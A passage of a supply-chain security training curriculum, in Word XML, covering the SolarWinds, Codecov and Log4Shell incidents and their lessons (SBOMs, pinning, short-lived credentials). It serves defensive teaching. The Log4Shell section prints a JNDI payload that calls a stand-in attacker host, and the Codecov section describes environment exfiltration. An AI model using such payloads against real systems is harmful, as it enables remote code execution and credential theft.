      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Industry-wide investment in build-system hardening, reproducible builds, and provenance attestation — all of which trace directly to the 'if the build server is compromised, everything downstream is tainted'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SolarWinds demonstrated that build-system compromise is a practical high-leverage attack vector. The attackers modified legitimately-compiled, legitimately-signed software by surgically replacing source files at the moment of compilation and restoring them immediately afterward. Eighteen thousand organizations installed the backdoor; approximately 100 were selected for deeper exploitation. The incident established supply chain security as a first-tier national-security concern and directly motivated the current generation of defensive frameworks (SLSA, SBOM, signing).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 3: Codecov (2021) — Compromised Tooling, Leaked Secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 What Codecov Is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Codecov is a software-as-a-service product for measuring and reporting code coverage from automated tests. Its typical usage pattern: a CI pipeline runs the test suite, produces a coverage report, and uploads the report to Codecov using a small uploader script. Codecov's service then presents the coverage data in dashboards, comments on pull requests, and integrates with the team's other tooling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Codecov was — and is — widely used, especially in open-source and commercial projects with significant CI investment. Its integration is lightweight and nearly invisible: teams install the uploader script once, and it runs automatically as part of their CI pipeline thereafter. Most users think about Codecov for a few minutes during setup and then forget it, treating it as trusted infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 What Happened</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In April 2021, Codecov disclosed that its Bash uploader script had been modified by an attacker on January 31, 2021. The modification was subtle: a few lines added to the script that, when run in a CI environment, exfiltrated the environment variables of the host system to an attacker-controlled server. For approximately two months, every CI run that used the Codecov uploader leaked its environment to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The compromise began with Codecov's own Docker images. An attacker gained access to credentials that allowed them to modify the Codecov Bash uploader script stored in a specific location. The modified script was then served from Codecov's own infrastructure — every user downloading the uploader received the tampered version. The tampered uploader, once run, worked normally from a user's perspective: coverage reports were uploaded and processed. What the user could not see was the additional exfiltration of environment data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Why Environment Leakage Is Catastrophic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The specific damage of this attack comes from what CI environments typically contain. A running CI job exposes, as environment variables:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cloud credentials for deployment (AWS access keys, GCP service account tokens, Azure client secrets) — usually the ones with the broadest privilege in the organization's cloud accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Registry credentials for pushing container images (Docker Hub, ECR, GCR, Artifactory).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Package-publishing credentials (npm, PyPI, RubyGems, Maven).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Git credentials and SSH keys used to push to protected branches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Third-party API keys for Slack, PagerDuty, JIRA, monitoring tools, and anything else the pipeline integrates with.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Signing keys for release artifacts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In other words, a CI job's environment is a compressed snapshot of the credentials needed to do deployment, publish artifacts, and operate the business's infrastructure. The Codecov uploader, by exfiltrating that environment, gave the attacker access to all of those credentials for every victim.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Codecov's customer base at the time included many large technology companies. Twilio, HashiCorp, Rapid7, Confluent, and others publicly disclosed that their credentials had been exposed via the Codecov incident and that they had rotated affected secrets. The full scope of the compromise is not publicly known because many organizations did not disclose whether their credentials were accessed by the attackers post-exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 The Subtle Attack Pattern</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Codecov is instructive because the attack was so small in its technical scope and so large in its consequences. The attackers did not compromise Codecov's main product; they modified a few lines in a single shell script. They did not need any kind of sophisticated implant, persistence mechanism, or command-and-control infrastructure — the attack executed once per CI run and sent data directly to a fixed endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The pattern illustrates a category of supply chain risk that is distinct from SolarWinds-style deep compromise:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tooling that runs inside trusted environments is a direct credential-exfiltration vector. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Any script, any SDK, any CI plugin that executes in your CI job's context has access to whatever credentials are in scope. If it is compromised, those credentials are compromised.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Low-importance tools still have high access. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Codecov is not a deploy tool; it is a coverage-reporting tool. But in the CI environment, it has the same access as the deploy tool. The attacker valued what Codecov could see, not what Codecov itself did.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Small changes are harder to detect. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A handful of lines added to a shell script do not show up in any obvious way. The script was downloaded fresh on every CI run; there was no 'update' notification or version bump that would have alerted users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Curl-pipe-to-bash is structurally dangerous. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The standard installation pattern for the Codecov uploader at the time was 'bash &lt;(curl -s https://codecov.io/bash)' — directly executing a shell script fetched at the moment of use, with no verification. Any modification to the upstream script takes effect immediately on every user without any local review or pinning. This pattern, popular with many installers, offers no resistance to supply chain compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 The Lessons</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Codecov reinforced and extended the lessons from SolarWinds in specific directions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Any code running in your CI can exfiltrate your CI secrets. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The scope of CI secrets is typically broad; the scope of code execution authority in CI is also broad. Combined, they make CI a concentrated target for credential theft.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Auxiliary tooling (coverage, monitoring, linting, notifications) must be treated with the same care as deployment tooling. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The blast radius of compromise is determined by the environment the tool runs in, not by the tool's ostensible purpose.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Pinning versions and verifying signatures matters. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Codecov now ships signed uploaders and encourages users to pin specific versions rather than auto-downloading the latest. Had these practices been universal at the time of the compromise, the attack would have been detected on the first attempted install of the tampered script.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Short-lived credentials mitigate secret-leak damage. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The Codecov victims who had already migrated to OIDC-based cloud authentication (Module 5 of the Secrets Management curriculum) were insulated from the worst impact — the credentials the attacker obtained expired within an hour. Those still using long-lived cloud keys faced a much larger incident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Codecov demonstrated that any tool running in a CI environment is effectively a deployment-authority tool, regardless of its ostensible purpose. A few lines added to a coverage-upload script exfiltrated the entire CI environment — including cloud credentials, registry tokens, and signing keys — from thousands of organizations. The lessons: pin and verify everything that runs in CI; treat auxiliary tools with the same security scrutiny as deployment tools; avoid curl-pipe-to-bash patterns; and bound the damage with short-lived credentials so that any exfiltration has a limited lifespan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 4: Log4Shell (2021) — The Ubiquitous Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 The Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In December 2021, researchers disclosed CVE-2021-44228: a remote code execution vulnerability in Log4j, the Apache Software Foundation's Java logging library. The vulnerability became known as Log4Shell. It was simple in both cause and exploitation: Log4j, when logging a string containing a specially-formatted message lookup directive, would attempt to fetch and execute content from a remote server. An attacker who could cause the target application to log a string the attacker controlled (often trivial — user-agent strings, form inputs, anything that ends up in a log line) could execute arbitrary code on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The exploitation was as simple as sending an HTTP request with a User-Agent header containing a JNDI lookup directive:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent: ${jndi:ldap://attacker.example.com/evil}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Any backend service running a vulnerable Log4j version and logging the User-Agent would, on processing the log, perform the JNDI lookup, fetch the attacker-specified class, and execute it. The severity was CVSS 10.0 — the maximum possible score.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 What Made Log4Shell Distinctive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Log4Shell is included in this module not because it was a supply-chain attack in the active-compromise sense — no attacker modified Log4j to introduce the vulnerability; it was an honest bug that had existed for years — but because it illustrated, with devastating clarity, the supply-chain dimension of dependency management. The vulnerability was not in any single organization's code; it was in a library that essentially everyone used, that essentially nobody inventoried explicitly, and that essentially every affected organization had to find and patch urgently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The specific properties that made this a supply-chain-shaped incident:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ubiquity. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Log4j was used directly by most Java applications and indirectly (as a transitive dependency) by even more. Estimates suggested tens of thousands of distinct artifacts depended on Log4j; practically every large organization running Java workloads had it somewhere.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Invisibility. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Log4j was rarely listed as a direct dependency. It was pulled in transitively by frameworks, application servers, build tools, and many other libraries. Most organizations had no accurate inventory of where Log4j was running — which is precisely the SBOM problem that Module 3 of this curriculum will address.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Urgency. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">From disclosure on December 9, 2021, to active mass exploitation was a matter of hours. Security teams across the world spent the following week in emergency mode, identifying which systems were vulnerable, patching them, and monitoring for exploitation attempts. Many organizations operated continuous incident response through the Christmas holidays of 2021.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Incomplete fixes. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The initial patch (Log4j 2.15.0) had additional vulnerabilities that required further patches (CVE-2021-45046, CVE-2021-45105). The final 'safe' version was Log4j 2.17.0 for JDK 7. Organizations had to do multiple cycles of patching and verification over the course of weeks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 The SBOM Gap It Exposed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The single most consequential fact about Log4Shell, from a supply-chain perspective, is that most affected organizations did not have a complete and accurate inventory of where Log4j was deployed. The technical fix — upgrade Log4j to a patched version — was clear within hours. The operational problem — figure out which of your systems need the fix — took weeks to months for many organizations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The typical incident-response process for Log4Shell included:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scan every running JVM for loaded Log4j classes, via various ad-hoc tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scan every Docker image for Log4j JARs, recursively (Log4j could be nested inside shaded JARs inside WAR files inside container images).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Query package managers (Maven, Gradle) for dependency trees of every service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Check every third-party vendor for their Log4j status, often via long vendor questionnaires.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Maintain a spreadsheet of affected systems, patching status, and verification evidence — sometimes for hundreds of systems and thousands of instances.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This frantic inventory-building was possible to do in a hurry. But it was the kind of thing that, done properly in advance, would have taken hours rather than weeks. SBOMs — Software Bills of Materials — are precisely the tool for keeping this inventory continuously. An organization with fresh SBOMs for all its production artifacts could answer 'do we have Log4j anywhere, and where?' in minutes. An organization without them had to rebuild the inventory under pressure, often incompletely. The industry-wide panic of December 2021 was, in substantial part, a panic about not knowing what you had.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4.4 What Log4Shell Demonstrated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies are production infrastructure, even when they are 'just libraries.' </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A library loaded into every process in an organization is, for security purposes, as important as any production server. It needs the same kind of inventory, monitoring, and patching discipline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Transitive dependencies are invisible but present. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Most Log4j deployments were via transitive dependencies, pulled in by frameworks or other libraries. A team that pinned only direct dependencies had little visibility into transitive risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Inventory must be continuous, not on-demand. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Building a dependency inventory under pressure is possible but slow, incomplete, and error-prone. The inventory must exist, current and searchable, before the incident happens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability disclosure creates its own attack window. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">From the moment a vulnerability is publicly disclosed to the moment every affected system is patched, there is a race. Attackers have scripts running mass scans for the new vulnerability within hours of disclosure. Every hour of delay in patching is an hour of exposure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Defense in depth matters. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Organizations that had strong network egress controls were materially less affected by Log4Shell, because the exploitation required an outbound JNDI connection to an attacker-controlled server. Blocking arbitrary outbound connections from internal services was a layer of defense that mitigated the exploit even on unpatched systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4.5 Aftermath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Log4Shell, more than any other single incident, motivated the SBOM requirements in Executive Order 14028 and subsequent regulatory activity. The phrase 'if you don't have an SBOM, you can't respond to the next Log4Shell' became a widely-cited argument for SBOM adoption. The tools and standards covered in later modules — CycloneDX, SPDX, syft, grype — all saw accelerated adoption in the months following Log4Shell as organizations moved to prevent a repeat of the inventory scramble.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Log4j project itself received attention — and funding — it had not had before. Log4j was maintained by a small number of volunteer maintainers despite its critical-infrastructure role; the incident highlighted the mismatch between criticality and support. The OpenSSF and various funding mechanisms (Alpha-Omega, the Sovereign Tech Fund, various vendor sponsorships) emerged in part to address this kind of mismatch across many similarly-situated critical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Log4Shell demonstrated that the supply-chain dimension of vulnerability management is often more significant than the vulnerability itself. The technical fix was fast; the inventory problem — figuring out where Log4j was deployed across complex dependency trees — took weeks. This motivated the SBOM work that appears throughout the rest of this curriculum. Dependencies are production infrastructure; transitive dependencies are invisible but present; continuous inventory must exist before incidents, not be built under pressure; and defense-in-depth layers (like egress controls) can mitigate even unpatched vulnerabilities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 5: event-stream (2018) — Maintainer Ownership Transfer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 The Sequence of Events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
